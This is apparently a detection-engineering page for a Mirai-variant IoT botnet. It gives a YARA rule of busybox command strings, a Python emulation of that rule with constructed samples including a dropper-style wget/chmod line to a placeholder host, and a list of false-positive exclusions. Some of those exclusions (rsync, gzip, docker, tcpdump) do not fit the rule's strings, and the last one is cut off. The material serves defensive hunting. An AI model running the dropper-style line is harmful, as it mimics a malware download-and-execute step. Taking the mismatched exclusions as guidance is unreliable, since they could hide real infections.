Adversaries using MiraiX version 7 may attempt to scan for vulnerable IoT devices by leveraging known CPE identifiers and weak default credentials. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential botnet command and control communications before they escalate into larger network compromises.
YARA Rule

rule is__Mirai_gen7 {
    meta:
        description = "Generic detection for MiraiX version 7"
        reference = "http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html"
        author = "unixfreaxjp"
        org = "MalwareMustDie"
        date = "2018-01-05"
    strings:
        $st01 = "/bin/busybox rm" fullword nocase wide ascii
        $st02 = "/bin/busybox echo" fullword nocase wide ascii
        $st03 = "/bin/busybox wget" fullword nocase wide ascii
        $st04 = "/bin/busybox tftp" fullword nocase wide ascii
        $st05 = "/bin/busybox cp" fullword nocase wide ascii
        $st06 = "/bin/busybox chmod" fullword nocase wide ascii
        $st07 = "/bin/busybox cat" fullword nocase wide ascii
    condition:
        5 of them
}
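To make the rule's matching semantics concrete, the following added example (not part of the original page or of the MalwareMustDie rule set) re-implements the seven strings and the "5 of them" condition in plain Python, emulating what the `fullword`, `nocase`, `wide` and `ascii` modifiers do: case-insensitive search for both the raw ASCII bytes and the UTF-16LE ("wide") form, with no alphanumeric character directly before or after the hit. The sample buffers are constructed for the example; the URL host and file names in them are placeholders, and the word-boundary handling for wide strings is a close approximation of YARA's rather than a byte-for-byte port.

```python
import re

# The seven strings from the is__Mirai_gen7 rule; each carries the same modifiers.
MIRAI_GEN7_STRINGS = {
    "$st01": "/bin/busybox rm",
    "$st02": "/bin/busybox echo",
    "$st03": "/bin/busybox wget",
    "$st04": "/bin/busybox tftp",
    "$st05": "/bin/busybox cp",
    "$st06": "/bin/busybox chmod",
    "$st07": "/bin/busybox cat",
}
THRESHOLD = 5  # the rule's condition: "5 of them"


def _patterns(s: str):
    """Build two regexes emulating YARA's `fullword nocase wide ascii` for one string."""
    # ascii: the literal bytes. fullword: no [A-Za-z0-9] byte immediately before or after.
    ascii_pat = re.compile(
        rb"(?<![A-Za-z0-9])" + re.escape(s.encode()) + rb"(?![A-Za-z0-9])",
        re.IGNORECASE,
    )
    # wide: every character followed by a NUL (UTF-16LE). fullword is checked on wide
    # characters, i.e. no <alnum><NUL> pair adjacent to the match (approximation of YARA).
    wide_pat = re.compile(
        rb"(?<![A-Za-z0-9]\x00)" + re.escape(s.encode("utf-16-le")) + rb"(?![A-Za-z0-9]\x00)",
        re.IGNORECASE,
    )
    return ascii_pat, wide_pat


def match_is_mirai_gen7(data: bytes):
    """Return the identifiers of rule strings present in `data` (ascii or wide form)."""
    hits = []
    for ident, s in MIRAI_GEN7_STRINGS.items():
        ascii_pat, wide_pat = _patterns(s)
        if ascii_pat.search(data) or wide_pat.search(data):
            hits.append(ident)
    return hits


def rule_fires(data: bytes) -> bool:
    """True when at least THRESHOLD of the seven strings are present, as in the rule."""
    return len(match_is_mirai_gen7(data)) >= THRESHOLD


# Constructed sample 1: a dropper-style shell fragment with six strings, mixed case.
SAMPLE_DROPPER = (
    b"cd /tmp; /bin/busybox wget http://example.invalid/x; /bin/busybox chmod 777 x; "
    b"/BIN/BUSYBOX cp x y; /bin/busybox cat x; /bin/busybox echo done; /bin/busybox rm -f x"
)

# Constructed sample 2: the same kind of content stored as UTF-16LE (the `wide` case).
SAMPLE_WIDE = (
    "/bin/busybox wget;/bin/busybox tftp;/bin/busybox cp;/bin/busybox chmod;/bin/busybox cat"
).encode("utf-16-le")

# Constructed sample 3: a benign script. Note "/bin/busybox rmdir" does NOT count as
# $st01 because `fullword` rejects the trailing "d"; only $st02 and $st07 match.
SAMPLE_BENIGN = (
    b"#!/bin/sh\n/bin/busybox rmdir /tmp/old\n/bin/busybox echo hi\n"
    b"/bin/busybox cat /etc/hostname\n"
)

if __name__ == "__main__":
    for name, buf in [("dropper", SAMPLE_DROPPER), ("wide", SAMPLE_WIDE), ("benign", SAMPLE_BENIGN)]:
        print(f"{name:8s} hits={match_is_mirai_gen7(buf)} fires={rule_fires(buf)}")
```

Run against real YARA the result should agree on these buffers; the point of the benign sample is that `fullword` is what keeps ordinary shell scripts that happen to call busybox from tripping the threshold on near-miss tokens.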
This rule contains 7 string patterns in its detection logic and fires when at least 5 of them are present. The following scenarios describe legitimate activity that may resemble this behavior when the rule is deployed, with a suggested filter or exclusion for each:
Scenario: Scheduled system backup using rsync
Description: A legitimate scheduled backup job using rsync may trigger the rule due to similar command patterns.
Filter/Exclusion: Exclude processes initiated by the root user with rsync in the command line, or filter by the presence of /backup/ in the command path.
Scenario: Admin task using curl to fetch configuration updates
Description: System administrators may use curl to fetch configuration updates from internal servers, which could resemble MiraiX traffic.
Filter/Exclusion: Exclude traffic originating from known admin IPs or processes initiated by users in the sudo group with curl commands targeting internal endpoints.
Scenario: Logrotate job executing gzip on log files
Description: The logrotate utility may execute gzip on log files, which could be misinterpreted as MiraiX activity due to the presence of gzip in the command.
Filter/Exclusion: Filter out processes related to logrotate or exclude commands containing gzip when executed by the root user in a specific directory like /etc/logrotate.d/.
Scenario: Docker container lifecycle management using docker CLI
Description: Commands like docker stop or docker rm may be flagged due to the presence of docker in the command line.
Filter/Exclusion: Exclude processes initiated by the docker user or filter commands that match known Docker management operations.
Scenario: Network monitoring tool using tcpdump for packet capture
Description: Tools like tcpdump may be used for legitimate packet capture and analysis, which could trigger the rule due to similar command structures.
Filter/Exclusion: Exclude processes with tcpdump that are run by the
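The four complete scenarios above each pair a benign pattern with an exclusion. The following added example (not from the original page) encodes those four exclusions as one auditable triage function over constructed process events, so that every suppressed event carries the scenario name that suppressed it. The event field names (`user`, `cmdline`, `cwd`, `src_ip`, `groups`, `parent`), the set of admin IPs and the reading of "internal endpoints" as RFC 1918 address space are assumptions made for the example; the tcpdump scenario is cut off on the page and is therefore not encoded.

```python
from dataclasses import dataclass
import re

# Constructed values for the example; substitute your environment's own.
ADMIN_IPS = {"10.0.0.5", "10.0.0.6"}  # "known admin IPs" from scenario 2
# "internal endpoints" interpreted as RFC 1918 hosts in the URL (assumption).
INTERNAL_URL = re.compile(r"^https?://(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")
# "known Docker management operations" from scenario 4 (assumed list).
DOCKER_OPS = re.compile(r"^docker\s+(stop|rm|start|restart|ps|logs)\b")


@dataclass
class ProcEvent:
    """Minimal process-creation record; field names are assumptions for the example."""
    user: str
    cmdline: str
    cwd: str = "/"
    src_ip: str = ""
    groups: frozenset = frozenset()
    parent: str = ""


def exclusion_reason(ev: ProcEvent):
    """Return the scenario name that excludes this event, or None if it should be kept."""
    argv = ev.cmdline.split()
    argv0 = argv[0] if argv else ""
    # Scenario 1: scheduled rsync backup (root running rsync, or /backup/ in the command path).
    if (ev.user == "root" and "rsync" in ev.cmdline) or "/backup/" in ev.cmdline:
        return "rsync backup"
    # Scenario 2: admin fetching configuration with curl from an admin IP or, as a sudo
    # group member, from an internal endpoint.
    if argv0 == "curl":
        url = next((tok for tok in argv if tok.startswith("http")), "")
        if ev.src_ip in ADMIN_IPS or ("sudo" in ev.groups and INTERNAL_URL.match(url)):
            return "admin curl"
    # Scenario 3: logrotate-driven gzip (child of logrotate, or root gzip under /etc/logrotate.d/).
    if ev.parent == "logrotate" or (
        argv0 == "gzip" and ev.user == "root" and ev.cwd.startswith("/etc/logrotate.d/")
    ):
        return "logrotate gzip"
    # Scenario 4: Docker lifecycle management by the docker user or a known docker operation.
    if ev.user == "docker" or DOCKER_OPS.match(ev.cmdline):
        return "docker lifecycle"
    return None


def triage(events):
    """Split events into (kept, excluded); excluded entries are (event, reason) pairs."""
    kept, excluded = [], []
    for ev in events:
        reason = exclusion_reason(ev)
        if reason:
            excluded.append((ev, reason))
        else:
            kept.append(ev)
    return kept, excluded


# Constructed sample events: four match a documented benign scenario, two do not.
SAMPLE_EVENTS = [
    ProcEvent("root", "rsync -a /srv /backup/srv"),
    ProcEvent("alice", "curl http://10.1.2.3/config.json", src_ip="10.9.9.9", groups=frozenset({"sudo"})),
    ProcEvent("root", "gzip /var/log/syslog.1", cwd="/etc/logrotate.d/"),
    ProcEvent("bob", "docker stop webapp"),
    ProcEvent("nobody", "/bin/busybox wget http://203.0.113.9/x"),
    ProcEvent("bob", "curl http://203.0.113.9/x", src_ip="10.9.9.9", groups=frozenset({"sudo"})),
]

if __name__ == "__main__":
    kept, excluded = triage(SAMPLE_EVENTS)
    for ev, reason in excluded:
        print(f"excluded [{reason}]: {ev.user}: {ev.cmdline}")
    for ev in kept:
        print(f"kept for review: {ev.user}: {ev.cmdline}")
```

Recording the reason string alongside each suppressed event is what lets the exclusions be reviewed later: the last sample event is a sudo-group user running curl against a non-internal host, and it stays in the queue because neither half of scenario 2's condition holds.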